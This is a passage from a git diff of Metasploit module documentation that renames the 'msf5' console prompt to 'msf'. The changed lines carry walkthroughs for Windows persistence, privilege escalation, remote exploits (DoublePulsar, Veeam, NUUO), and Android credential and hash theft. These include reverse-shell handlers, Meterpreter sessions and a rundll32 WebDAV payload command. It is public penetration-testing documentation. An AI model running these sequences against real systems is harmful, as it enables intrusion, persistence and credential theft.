0 Automatic -msf5 exploit(windows/local/persistence_image_exec_options) > +msf exploit(windows/local/persistence_image_exec_options) > ``` In another window, start a listener and then launch notepad.exe on the target. Close notepad.exe and you should get a callback: ``` -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.135.168:4545 [*] Sending stage (206403 bytes) to 192.168.132.125 diff --git a/documentation/modules/exploit/windows/local/persistence_service.md b/documentation/modules/exploit/windows/local/persistence_service.md index 1795e2fbd9..03132b662a 100644 --- a/documentation/modules/exploit/windows/local/persistence_service.md +++ b/documentation/modules/exploit/windows/local/persistence_service.md @@ -39,7 +39,7 @@ The name of service. Random string as default. ### Windows 7 SP1 x64 ``` -msf5 exploit(windows/local/persistence_service) > sessions -i 1 +msf exploit(windows/local/persistence_service) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid @@ -54,16 +54,16 @@ Logged On Users : 2 Meterpreter : x86/windows meterpreter > background [*] Backgrounding session 1... -msf5 exploit(windows/local/persistence_service) > use exploit/windows/local/persistence_service -msf5 exploit(windows/local/persistence_service) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/persistence_service) > use exploit/windows/local/persistence_service +msf exploit(windows/local/persistence_service) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/persistence_service) > set lport 2333 +msf exploit(windows/local/persistence_service) > set lport 2333 lport => 2333 -msf5 exploit(windows/local/persistence_service) > set lhost 192.168.56.1 +msf exploit(windows/local/persistence_service) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf5 exploit(windows/local/persistence_service) > set session 1 +msf exploit(windows/local/persistence_service) > set session 1 session => 1 -msf5 exploit(windows/local/persistence_service) > exploit +msf exploit(windows/local/persistence_service) > exploit [*] Started reverse TCP handler on 192.168.56.1:2333 [*] Running module against TEST-PC @@ -91,7 +91,7 @@ meterpreter > background **Clean it** ``` -msf5 exploit(windows/local/persistence_service) > sessions -i 1 +msf exploit(windows/local/persistence_service) > sessions -i 1 [*] Starting interaction with 1... meterpreter > resource /Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc diff --git a/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md b/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md index a036093ae5..72ba06b84a 100644 --- a/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md +++ b/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md @@ -38,16 +38,16 @@ ### Windows 7 SP1 (x64) ``` - msf5 > use exploit/windows/local/plantronics_hub_spokesupdateservice_privesc - msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set session 1 + msf > use exploit/windows/local/plantronics_hub_spokesupdateservice_privesc + msf exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set session 1 session => 1 - msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set verbose true + msf exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set verbose true verbose => true - msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > check + msf exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > check [*] The service is running, but could not be validated. - msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set lhost 172.16.191.165 + msf exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > run + msf exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Writing payload to C:\Users\test\AppData\Local\Temp\MuVtxrl9.exe ... diff --git a/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md b/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md index 030e826d86..a77d0bbe3b 100644 --- a/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md +++ b/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md @@ -32,12 +32,12 @@ ### Tested on Ricoh PCL6 Universal Driver `v4.13` ``` - msf5 > use multi/handler - msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp + msf > use multi/handler + msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lhost 192.168.37.1 + msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (206403 bytes) to 192.168.37.199 @@ -55,7 +55,7 @@ Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... - msf5 exploit(multi/handler) > use ricoh_driver_privesc + msf exploit(multi/handler) > use ricoh_driver_privesc Matching Modules ================ @@ -66,15 +66,15 @@ [*] Using exploit/windows/local/ricoh_driver_privesc - msf5 exploit(windows/local/ricoh_driver_privesc) > set session 1 + msf exploit(windows/local/ricoh_driver_privesc) > set session 1 session => 1 - msf5 exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp + msf exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp - msf5 exploit(windows/local/ricoh_driver_privesc) > set lhost 192.168.37.1 + msf exploit(windows/local/ricoh_driver_privesc) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(windows/local/ricoh_driver_privesc) > check + msf exploit(windows/local/ricoh_driver_privesc) > check [*] The target appears to be vulnerable. Ricoh driver directory has full permissions - msf5 exploit(windows/local/ricoh_driver_privesc) > run + msf exploit(windows/local/ricoh_driver_privesc) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Adding printer JLFJCi... diff --git a/documentation/modules/exploit/windows/local/webexec.md b/documentation/modules/exploit/windows/local/webexec.md index cd22b52eac..ed3b16be2a 100644 --- a/documentation/modules/exploit/windows/local/webexec.md +++ b/documentation/modules/exploit/windows/local/webexec.md @@ -23,12 +23,12 @@ ``` - msf5 > use multi/handler - msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp + msf > use multi/handler + msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lhost 192.168.37.1 + msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (179779 bytes) to 192.168.37.136 @@ -38,14 +38,14 @@ Server username: WIN-MGMN7ND70I1\a_user meterpreter > background [*] Backgrounding session 1... - msf5 exploit(multi/handler) > use exploit/windows/local/webexec - msf5 exploit(windows/local/webexec) > set session 1 + msf exploit(multi/handler) > use exploit/windows/local/webexec + msf exploit(windows/local/webexec) > set session 1 session => 1 - msf5 exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp + msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(windows/local/webexec) > set lhost 192.168.37.1 + msf exploit(windows/local/webexec) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(windows/local/webexec) > run + msf exploit(windows/local/webexec) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Checking service exists... diff --git a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md index 32e6461efa..3bf7fa5774 100644 --- a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md +++ b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md @@ -47,16 +47,16 @@ ### Windows 7 SP1 (x64) ``` - msf5 > use exploit/windows/local/windscribe_windscribeservice_priv_esc - msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1 + msf > use exploit/windows/local/windscribe_windscribeservice_priv_esc + msf exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1 session => 1 - msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true + msf exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true verbose => true - msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > check + msf exploit(windows/local/windscribe_windscribeservice_priv_esc) > check [*] The service is running, but could not be validated. - msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 172.16.191.165 + msf exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run + msf exploit(windows/local/windscribe_windscribeservice_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Writing payload (283 bytes) to C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe ... diff --git a/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md b/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md index b253170759..fd60389679 100644 --- a/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md +++ b/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md @@ -40,12 +40,12 @@ ## Scenarios - msf5 > use exploit/windows/misc/ais_esel_server_rce - msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212 + msf > use exploit/windows/misc/ais_esel_server_rce + msf exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212 rhosts => 10.66.75.212 - msf5 exploit(windows/misc/ais_esel_server_rce) > check + msf exploit(windows/misc/ais_esel_server_rce) > check [+] 10.66.75.212:5099 - The target is vulnerable. - msf5 exploit(windows/misc/ais_esel_server_rce) > run + msf exploit(windows/misc/ais_esel_server_rce) > run [*] Started reverse TCP handler on 10.66.75.208:4444 [+] 10.66.75.212:5099 - Correct response received => Data send successfully diff --git a/documentation/modules/exploit/windows/misc/crosschex_device_bof.md b/documentation/modules/exploit/windows/misc/crosschex_device_bof.md index e115aadde4..a1e8ef6b7a 100644 --- a/documentation/modules/exploit/windows/misc/crosschex_device_bof.md +++ b/documentation/modules/exploit/windows/misc/crosschex_device_bof.md @@ -50,7 +50,7 @@ As above. ## Scenarios ``` -msf5 exploit(windows/misc/crosschex_device_bof) > run +msf exploit(windows/misc/crosschex_device_bof) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] CrossChex broadcast received, sending payload in response diff --git a/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md b/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md index 908efbb240..c242c41825 100644 --- a/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md +++ b/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md @@ -29,8 +29,8 @@ ### TinyIdentD 2.2 on Windows XP SP0 - English (x86) ``` - msf5 > use exploit/windows/misc/tiny_identd_overflow - msf5 exploit(windows/misc/tiny_identd_overflow) > show targets + msf > use exploit/windows/misc/tiny_identd_overflow + msf exploit(windows/misc/tiny_identd_overflow) > show targets Exploit targets: @@ -46,11 +46,11 @@ 7 Windows XP SP2 - Italian - msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5 + msf exploit(windows/misc/tiny_identd_overflow) > set target 5 target => 5 - msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140 + msf exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140 rhosts => 172.16.191.140 - msf5 exploit(windows/misc/tiny_identd_overflow) > run + msf exploit(windows/misc/tiny_identd_overflow) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ... diff --git a/documentation/modules/exploit/windows/misc/veeam_one_agent_deserialization.md b/documentation/modules/exploit/windows/misc/veeam_one_agent_deserialization.md index 58f97ac411..c3361bf893 100644 --- a/documentation/modules/exploit/windows/misc/veeam_one_agent_deserialization.md +++ b/documentation/modules/exploit/windows/misc/veeam_one_agent_deserialization.md @@ -55,8 +55,8 @@ if your environment is different. ### Veeam ONE Agent 10.0.0.750 on Windows 10 x64 ``` -msf5 > use exploit/windows/misc/veeam_one_agent_deserialization -msf5 exploit(windows/misc/veeam_one_agent_deserialization) > options +msf > use exploit/windows/misc/veeam_one_agent_deserialization +msf exploit(windows/misc/veeam_one_agent_deserialization) > options Module options (exploit/windows/misc/veeam_one_agent_deserialization): @@ -88,11 +88,11 @@ Exploit target: 2 PowerShell Stager -msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set rhosts 172.16.249.150 +msf exploit(windows/misc/veeam_one_agent_deserialization) > set rhosts 172.16.249.150 rhosts => 172.16.249.150 -msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set lhost 172.16.249.1 +msf exploit(windows/misc/veeam_one_agent_deserialization) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(windows/misc/veeam_one_agent_deserialization) > run +msf exploit(windows/misc/veeam_one_agent_deserialization) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] 172.16.249.150:2805 - Connecting to 172.16.249.150:2805 diff --git a/documentation/modules/exploit/windows/misc/webdav_delivery.md b/documentation/modules/exploit/windows/misc/webdav_delivery.md index a61275d56a..d089def406 100644 --- a/documentation/modules/exploit/windows/misc/webdav_delivery.md +++ b/documentation/modules/exploit/windows/misc/webdav_delivery.md @@ -19,11 +19,11 @@ and then getting a session back. # Demo ``` -msf5 exploit(windows/misc/webdav_delivery) > run +msf exploit(windows/misc/webdav_delivery) > run [*] Exploit running as background job 3. [*] Started reverse TCP handler on 172.16.249.1:4444 -msf5 exploit(windows/misc/webdav_delivery) > [*] Using URL: http://172.16.249.1:8080/ +msf exploit(windows/misc/webdav_delivery) > [*] Using URL: http://172.16.249.1:8080/ [*] Server started. [*] Run the following command on the target machine: rundll32.exe \\172.16.249.1@8080\ANYTHING,Init @@ -31,7 +31,7 @@ rundll32.exe \\172.16.249.1@8080\ANYTHING,Init [*] Sending stage (180291 bytes) to 172.16.249.130 [*] Meterpreter session 4 opened (172.16.249.1:4444 -> 172.16.249.130:49219) at 2018-12-12 13:25:06 -0600 -msf5 exploit(windows/misc/webdav_delivery) > sessions +msf exploit(windows/misc/webdav_delivery) > sessions Active sessions =============== @@ -40,5 +40,5 @@ Active sessions -- ---- ---- ----------- ---------- 4 meterpreter x86/windows 172.16.249.1:4444 -> 172.16.249.130:49219 (172.16.249.130) -msf5 exploit(windows/misc/webdav_delivery) > +msf exploit(windows/misc/webdav_delivery) > ``` diff --git a/documentation/modules/exploit/windows/nimsoft/nimcontroller_bof.md b/documentation/modules/exploit/windows/nimsoft/nimcontroller_bof.md index 4fed51fe31..5bd3c43c7a 100644 --- a/documentation/modules/exploit/windows/nimsoft/nimcontroller_bof.md +++ b/documentation/modules/exploit/windows/nimsoft/nimcontroller_bof.md @@ -27,7 +27,7 @@ exploit the service an unlimited amount of times. ### Windows 10 x64 ``` -msf5 exploit(windows/nimsoft/nimcontroller_bof) > options +msf exploit(windows/nimsoft/nimcontroller_bof) > options Module options (exploit/windows/nimsoft/nimcontroller_bof): @@ -55,7 +55,7 @@ Exploit target: 0 Windows Universal (x64) - v7.80.3132 -msf5 exploit(windows/nimsoft/nimcontroller_bof) > exploit +msf exploit(windows/nimsoft/nimcontroller_bof) > exploit [*] Started HTTPS reverse handler on https://A.B.C.D:8443 [*] W.X.Y.Z:48000 - Executing automatic check (disable AutoCheck to override) @@ -94,9 +94,9 @@ meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > background [*] Backgrounding session 1... -msf5 exploit(windows/nimsoft/nimcontroller_bof) > set DIRECTORY C:\\Users\\ +msf exploit(windows/nimsoft/nimcontroller_bof) > set DIRECTORY C:\\Users\\ DIRECTORY => C:\Users\ -msf5 exploit(windows/nimsoft/nimcontroller_bof) > check +msf exploit(windows/nimsoft/nimcontroller_bof) > check [*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun 1 2015] detected, sending directory_list probe diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index 12446fe3b5..dfd840eaa3 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md @@ -35,11 +35,11 @@ This module will either use a provided session number (which can be guessed with ### Testing on Windows 10 Pro x64 running NCS Server 2.4.0 ``` -msf5 exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200 +msf exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 exploit(windows/nuuo/nuuo_cms_fu) > set verbose true +msf exploit(windows/nuuo/nuuo_cms_fu) > set verbose true verbose => true -msf5 exploit(windows/nuuo/nuuo_cms_fu) > exploit +msf exploit(windows/nuuo/nuuo_cms_fu) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] 172.22.222.200:5180 - Backing up LicenseTool.dll to TQzixBdpOiRG diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_sqli.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_sqli.md index 984df4036d..283786d620 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_sqli.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_sqli.md @@ -54,11 +54,11 @@ The following versions were tested: ### Tested on Windows 10 Pro x64 running NCS Server 2.4.0 ``` -msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set rhosts 172.22.222.200 +msf exploit(windows/nuuo/nuuo_cms_sqli) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set srvhost 172.22.222.136 +msf exploit(windows/nuuo/nuuo_cms_sqli) > set srvhost 172.22.222.136 srvhost => 172.22.222.136 -msf5 exploit(windows/nuuo/nuuo_cms_sqli) > exploit +msf exploit(windows/nuuo/nuuo_cms_sqli) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] 172.22.222.200:5180 - Starting up our web service on http://172.22.222.136:8080/YxAxhLwOUeKzH ... diff --git a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md index ff3ac7c320..805b37bf14 100644 --- a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md +++ b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md @@ -32,7 +32,7 @@ Defaults to `spoolsv.exe`. Pinging the implant: ``` -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check +msf exploit(windows/rdp/rdp_doublepulsar_rce) > check [*] 192.168.56.115:3389 - Verifying RDP protocol... [*] 192.168.56.115:3389 - Attempting to connect using TLS security @@ -41,15 +41,15 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check [!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!! [+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64 [+] 192.168.56.115:3389 - The target is vulnerable. -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > +msf exploit(windows/rdp/rdp_doublepulsar_rce) > ``` Executing a payload: ``` -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Execute\ payload +msf exploit(windows/rdp/rdp_doublepulsar_rce) > set target Execute\ payload target => Execute payload -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run +msf exploit(windows/rdp/rdp_doublepulsar_rce) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.115:3389 - Verifying RDP protocol... @@ -81,9 +81,9 @@ meterpreter > Neutralizing the implant: ``` -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Neutralize\ implant +msf exploit(windows/rdp/rdp_doublepulsar_rce) > set target Neutralize\ implant target => Neutralize implant -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run +msf exploit(windows/rdp/rdp_doublepulsar_rce) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.115:3389 - Verifying RDP protocol... @@ -95,5 +95,5 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run [*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR [+] 192.168.56.115:3389 - Implant neutralization successful [*] Exploit completed, but no session was created. -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > +msf exploit(windows/rdp/rdp_doublepulsar_rce) > ``` diff --git a/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md b/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md index 68e3ce776c..a2224899bf 100644 --- a/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md +++ b/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md @@ -32,22 +32,22 @@ Defaults to `spoolsv.exe`. Pinging the implant: ``` -msf5 exploit(windows/smb/smb_doublepulsar_rce) > check +msf exploit(windows/smb/smb_doublepulsar_rce) > check [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 [*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1 [*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR [!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64 [+] 192.168.56.115:445 - The target is vulnerable. -msf5 exploit(windows/smb/smb_doublepulsar_rce) > +msf exploit(windows/smb/smb_doublepulsar_rce) > ``` Executing a payload: ``` -msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Execute\ payload +msf exploit(windows/smb/smb_doublepulsar_rce) > set target Execute\ payload target => Execute payload -msf5 exploit(windows/smb/smb_doublepulsar_rce) > run +msf exploit(windows/smb/smb_doublepulsar_rce) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 @@ -78,9 +78,9 @@ meterpreter > Neutralizing the implant: ``` -msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Neutralize\ implant +msf exploit(windows/smb/smb_doublepulsar_rce) > set target Neutralize\ implant target => Neutralize implant -msf5 exploit(windows/smb/smb_doublepulsar_rce) > run +msf exploit(windows/smb/smb_doublepulsar_rce) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 @@ -90,5 +90,5 @@ msf5 exploit(windows/smb/smb_doublepulsar_rce) > run [*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR [+] 192.168.56.115:445 - Implant neutralization successful [*] Exploit completed, but no session was created. -msf5 exploit(windows/smb/smb_doublepulsar_rce) > +msf exploit(windows/smb/smb_doublepulsar_rce) > ``` diff --git a/documentation/modules/exploit/windows/smb/webexec.md b/documentation/modules/exploit/windows/smb/webexec.md index 897d6b5d19..eef1e92060 100644 --- a/documentation/modules/exploit/windows/smb/webexec.md +++ b/documentation/modules/exploit/windows/smb/webexec.md @@ -27,18 +27,18 @@ ``` - msf5 > use exploit/windows/smb/webexec - msf5 exploit(windows/smb/webexec) > set smbuser a_user + msf > use exploit/windows/smb/webexec + msf exploit(windows/smb/webexec) > set smbuser a_user smbuser => a_user - msf5 exploit(windows/smb/webexec) > set smbpass password + msf exploit(windows/smb/webexec) > set smbpass password smbpass => password - msf5 exploit(windows/smb/webexec) > set rhosts 192.168.37.136 + msf exploit(windows/smb/webexec) > set rhosts 192.168.37.136 rhosts => 192.168.37.136 - msf5 exploit(windows/smb/webexec) > set payload windows/meterpreter/reverse_tcp + msf exploit(windows/smb/webexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(windows/smb/webexec) > set lhost 192.168.37.1 + msf exploit(windows/smb/webexec) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(windows/smb/webexec) > run + msf exploit(windows/smb/webexec) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] 192.168.37.136:445 - Connecting to the server... diff --git a/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md b/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md index bb1f5f7977..cb1c2e5844 100644 --- a/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md +++ b/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md @@ -44,10 +44,10 @@ ### Microsoft Windows XP SP3 (EN) ``` - msf5 > use exploit/windows/tftp/distinct_tftp_traversal - msf5 exploit(windows/tftp/distinct_tftp_traversal) > set rhosts 172.16.191.205 + msf > use exploit/windows/tftp/distinct_tftp_traversal + msf exploit(windows/tftp/distinct_tftp_traversal) > set rhosts 172.16.191.205 rhosts => 172.16.191.205 - msf5 exploit(windows/tftp/distinct_tftp_traversal) > run + msf exploit(windows/tftp/distinct_tftp_traversal) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Sending EXE (73802 bytes) diff --git a/documentation/modules/payload/windows/shell/reverse_ord_tcp.md b/documentation/modules/payload/windows/shell/reverse_ord_tcp.md index 066166ad08..0464b6ca3a 100644 --- a/documentation/modules/payload/windows/shell/reverse_ord_tcp.md +++ b/documentation/modules/payload/windows/shell/reverse_ord_tcp.md @@ -18,7 +18,7 @@ This Meterpreter payload is suitable for the following environments: To check its compatibility with an exploit, select the exploit in the msf console and type the ```info``` command. The output will be similar to: ``` -msf5 payload(windows/shell/reverse_tcp) > info +msf payload(windows/shell/reverse_tcp) > info Name: Windows Command Shell, Reverse TCP Stager Module: payload/windows/shell/reverse_tcp diff --git a/documentation/modules/post/android/capture/screen.md b/documentation/modules/post/android/capture/screen.md index 97fb6b54e5..43067458f6 100644 --- a/documentation/modules/post/android/capture/screen.md +++ b/documentation/modules/post/android/capture/screen.md @@ -29,7 +29,7 @@ Utilizing futex_requeue to get root access. ``` -msf5 exploit(android/local/futex_requeue) > run +msf exploit(android/local/futex_requeue) > run [*] Started reverse TCP handler on 111.111.1.111:4444 [*] Using target: New Samsung @@ -43,10 +43,10 @@ meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > background [*] Backgrounding session 4... -msf5 exploit(android/local/futex_requeue) > use post/android/capture/screen -msf5 post(android/capture/screen) > set session 4 +msf exploit(android/local/futex_requeue) > use post/android/capture/screen +msf post(android/capture/screen) > set session 4 session => 4 -msf5 post(android/capture/screen) > run +msf post(android/capture/screen) > run [!] SESSION may not be compatible with this module. [+] Downloading screenshot... diff --git a/documentation/modules/post/android/gather/hashdump.md b/documentation/modules/post/android/gather/hashdump.md index f68a5a8201..895ee0861f 100644 --- a/documentation/modules/post/android/gather/hashdump.md +++ b/documentation/modules/post/android/gather/hashdump.md @@ -100,7 +100,7 @@ resource (android.128.rb)> run [+] SHA1: EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b [+] Crack with: hashcat -m 5800 EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b [*] Post module execution completed -msf5 post(android/gather/hashdump) > creds +msf post(android/gather/hashdump) > creds Credentials =========== diff --git a/documentation/modules/post/android/gather/sub_info.md b/documentation/modules/post/android/gather/sub_info.md index e1b20ec542..7564a8efa1 100644 --- a/documentation/modules/post/android/gather/sub_info.md +++ b/documentation/modules/post/android/gather/sub_info.md @@ -24,10 +24,10 @@ ``` -msf5 exploit(multi/handler) > use post/android/gather/sub_info -msf5 post(android/gather/sub_info) > set session 1 +msf exploit(multi/handler) > use post/android/gather/sub_info +msf post(android/gather/sub_info) > set session 1 session => 1 -msf5 post(android/gather/sub_info) > run +msf post(android/gather/sub_info) > run [!] SESSION may not be compatible with this module. [*] using code : 1 @@ -95,5 +95,5 @@ Subscriber info VoiceMailNumberForSubscriber [*] Post module execution completed -msf5 post(android/gather/sub_info) > +msf post(android/gather/sub_info) > ``` diff --git a/documentation/modules/post/android/gather/wireless_ap.md b/documentation/modules/post/android/gather/wireless_ap.md index d3e744b6d7..dd20f7b744 100644 --- a/documentation/modules/post/android/gather/wireless_ap.md +++ b/documentation/modules/post/android/gather/wireless_ap.md @@ -23,10 +23,10 @@ ``` -msf5 exploit(multi/handler) > use post/android/gather/wireless_ap -msf5 post(android/gather/wireless_ap) > set session 1 +msf exploit(multi/handler) > use post/android/gather/wireless_ap +msf post(android/gather/wireless_ap) > set session 1 session => 1 -msf5 post(android/gather/wireless_ap) > run +msf post(android/gather/wireless_ap) > run Wireless APs ============ @@ -41,5 +41,5 @@ Wireless APs [+] Secrets stored in: ~/.msf4/loot/...wireless.ap.cred_...txt [*] Post module execution completed -msf5 post(android/gather/wireless_ap) > +msf post(android/gather/wireless_ap) > ``` diff --git a/documentation/modules/post/android/manage/remove_lock_root.md b/documentation/modules/post/android/manage/remove_lock_root.md index d6ef78b6a8..01d19e2b3c 100644 --- a/documentation/modules/post/android/manage/remove_lock_root.md +++ b/documentation/modules/post/android/manage/remove_lock_root.md @@ -24,7 +24,7 @@ Utilizing futex_requeue to get root access. ``` -msf5 exploit(android/local/futex_requeue) > run +msf exploit(android/local/futex_requeue) > run [*] Started reverse TCP handler on 111.111.1.111:4444 [*] Using target: New Samsung @@ -38,10 +38,10 @@ meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > background [*] Backgrounding session 4... -msf5 exploit(android/local/futex_requeue) > use post/android/manage/remove_lock_root -msf5 post(android/manage/remove_lock_root) > set session 4 +msf exploit(android/local/futex_requeue) > use post/android/manage/remove_lock_root +msf post(android/manage/remove_lock_root) > 